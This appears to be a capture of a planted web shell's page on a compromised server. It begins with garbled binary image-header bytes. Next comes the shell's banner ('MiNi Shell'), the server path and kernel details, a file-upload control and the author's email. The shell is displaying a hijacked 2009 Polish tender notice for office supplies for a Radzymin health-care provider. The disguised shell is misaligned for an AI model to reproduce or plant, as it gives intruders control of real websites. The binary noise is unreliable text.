JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090331/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090331/56353-N-2009.html

<p class="kh_header"><b>Radzymin: Zakup i dostawę artykułów biurowych, kopert i druków medycznych</b><br>
<b>Numer ogłoszenia: 56353 - 2009; data zamieszczenia: 31.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 022 7865037, faks 022 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzzoz-radzymin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawę artykułów biurowych, kopert i druków medycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Ilość
1	Papier POL lux A4 80g/2mm	550 ryz

2	Papier POL lux A3 80g/2mm	5 ryz
3	Segregator A4 foliowany  czerwony  75 mm  z szyna met.	50 szt
4	 Segregator foliowany czarny  75 mm z szyna met.	50 szt.
5	Segregator A4 foliowany  żółty  75 mm  z szyna met.	50 szt
6	 Segregator foliowany niebieski  50 mm z szyna met.	50 szt.
7	Teczka kartonowa niebieska A4  z gumką 	100 szt
8	Długopis BIC Orange czerwony 	20 szt.
9	Długopis BIC Orange czarny	20 szt.
10	Długopis BIC Orange niebieski	20 szt.
11	Długopis Orange zielony 	10 szt.

12	Długopis Atlantis niebieski	50 szt.

13	Marker na bazie wody grubość linii 3 mm czarny	50 szt.
14	Markier lakierowy grubość linii 2 mm czarny	50 szt.
15	Marker do tablic suchoście. zestaw 4 kolory	5 szt.
16	Spinacze biurowe 50 mm	50 op.

17	Spinacze biurowe 33 mm
	100 op.
18	Koszulka krystaliczna A4 100 szt. op. 	100 op.
19	Koszulka krystaliczna szeroka A4   25 szt. op.	20 op.
20	Pineska beczułka	5 op.

21	Pineska zwykła metalowa
	10 op.
22	Ołówek z gumką 2988 / HB 	12 szt.
23	Brulion w kratkę 96 k.  A4 twarda okładka 	50 szt.
24	Brulion w kratkę 96  A5 twarda okładka 	50 szt.
25	Flamaster czarny
	10 szt.
26	Korektor w długopisie 12 ml.  Tipp-Ex	15  szt.

27	Korektor w płynie 20 ml. Tipp-Ex	30 szt

28	Zszywki 24/6 	1000szt

29	Zszywki  23/8 	10 op.

30	Tusz do stempli uniwersalny  czarny 	10 szt.
31	Zszywacz FC 5505 Leitz na zszywki 24/6  	5
32	Dyskietki 3,5 2 HD  TDK  	10 op.

33	Płyty CD-R  SONY  CAKE 48X  ( op. 50 szt)	10 op.
34	Skoroszyt wpinany A4 okładka przednia przezro. tylna kolorowa	100 szt.
35	Teczka kartonowa kolorowa A4  z gumką 	100 szt
36	Skoroszyt kartono. A4 biały 	100 szt

37	Grzbiety do bindowania  plastk.  8 mm	1 op
38	Okładki  A4 przezroczyste do dokumentów służące jako pierwsza strona 	1 op
39	Okładki skóropodobne A4  służące jako ostatnia strona  ( granatowe)	1 op.
40	Nożyczki1 uniwersalne 
  15,5 cm 	5 szt
41	Woreczki strunowe 175 x 250 mm 	15 op.
42	Klej sztyft IMPEGA  20G	30 szt
43	Taśma TESA Transparent - Film  19 mm 	50 szt
44	Blok A5 bez okładki  w kratkę 	10 szt.
45	Notes  samoprzylepny  
50x 40 mm     3 szt w op.	25 op.
46	Notes samoprzylepny do podajnika  Post-it	10 szt
47	Podajnik Millenium model  C2014	2
48	Baterie alkaiczne ENERGIZER AAA kod BAK  001   1,5 V 	10 op.
49	Baterie alkaiczne ENERGIZER AA kod BAK 003  1,5 V  	10 op.
50	Półki na dokumenty przezroczyste	10 szt
51	Zakreślasz  fluorescencyjny STABLO BOSS  (4 kolor)	5  op.
52	Flamastry etui (4 kolory)	20 op.

53	Przekładki kartonowe 	200 szt.

54	Linijka 30 cm 	10 szt.

55	Zeszyt A5    32 kart	50 szt.

56	Płyn do czyszczenia tablic suchościeralno- magnetycznych	2  szt.
57	Grzbiety  do bindownia plastykowe  8 mm	2 op.
58	Grzbiety do bindownia plastykowe 10 mm 	2 op.
59	Okładki przezroczy. 0,15 mm	2 op.
60	Klipsy do papieru Grand  19 mm 	20 op
61	Klipsy do papieru Grand  25 mm	20 op
62	Klipsy do papieru Grand  32 mm	20 op
63	Przybornik na biurko Dual walec z szufladkami symbol 1995	2 szt
64	Kalka maszynowa niebieska standardowa symbol 2000G	1 op.
65	Folia folia NOBO 33634668     A4  Nr kodu XPKO42	50 ark. A4
66	Folia NOBO33633740 
    A4    Nr kodu XPKO83	50 ark. 
67	Mechanizm skoroszytowy Donau  (zielone)	4  op.
68	Grzbiety wsuwane A4 leitz  (niebieskie)  GBK 127	1 op.
69	Grzbiety do bindownicy  GBK019 (niebieskie) 	1 op
70	Grzbiety do bindownicy   GBK024  (niebieskie)	1 op.
71	Temperówka z pojemnikiem 	5 szt
72	Cienkopis Stabilo Point 88 
Czerwony 40	5
73	Cienkopis Stabilo Point 88 
Zielony 36	5
74	Cienkopis Stabilo Point 88 
Ciemno niebieski 41	10
75	Cienkopis Stabilo Point 88 
Czarny 46	5
76	Papier POL lux A4 80g/2mm  mikx kolorów	1 ryzy
77	Dysk DVD +R/R  16x  kod XCK 029	1 op.
78	Gumka Rasoplast	5 szt

79	 Kredki ołówkowe   24 kolory                                                                                                                                                                             	2 op.
80	Kredki świecowe
	5 op..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1. Złożą ofertę w pełni spełniającą wymagania niniejszej SIWZ.
2. Posiadają uprawnienia do wykonywania działalności w przedmiocie zamówienia.
3. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym             i osobami zdolnymi do wykonania zamówienia.
4. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej terminową realizację zamówienia przy założeniu, że zapłata za realizację zamówienia będzie odbywać się na warunkach określonych w niniejszej SIWZ tzn. nie wcześniej niż 30 dni od dnia otrzymania faktury VAT.
5. Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy - Prawo zamówień publicznych.
6. Jeżeli oferta Wykonawców, o których mowa w art.23 ust.1 ustawy ( Wykonawcy wspólnie ubiegający się o udzielenie zamówienia), zostanie wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Formularz ofertowy - wg. załączonego wzoru.
2.	Formularz cenowy wg.  Załącznika Nr 1do SIWZ  .
3.	Oświadczenie, że spełniają warunki określone w art. 22 ust. 1 i nie podlegają wykluczeniu z postępowania na mocy art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych - stanowiące Załącznik Nr  2  do SIWZ.
4.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.	Wykaz wykonywanych w okresie ostatnich trzech lat dostaw w przedmiocie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem, ich wartości, przedmiotu, daty wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy te zostały wykonane należycie - według załączonego wzoru stanowiącego Załącznik Nr 3  do SIWZ. 
7.	Parafowany  wzór umowy.   Załączniki Nr  4  do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzzoz-radzymin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Samodzielnym Publicznym Zespole Zakładów Opieki Zdrowotnej w Radzyminie ul. Konstytucji 3 Maja 17 budynek przychodni   pok. 214 II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2009 godzina 10:30, miejsce: w Samodzielnym Publicznym Zespole Zakładów Opieki Zdrowotnej w Radzyminie ul. Konstytucji 3 Maja 17 budynek przychodni   pok. 214 II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com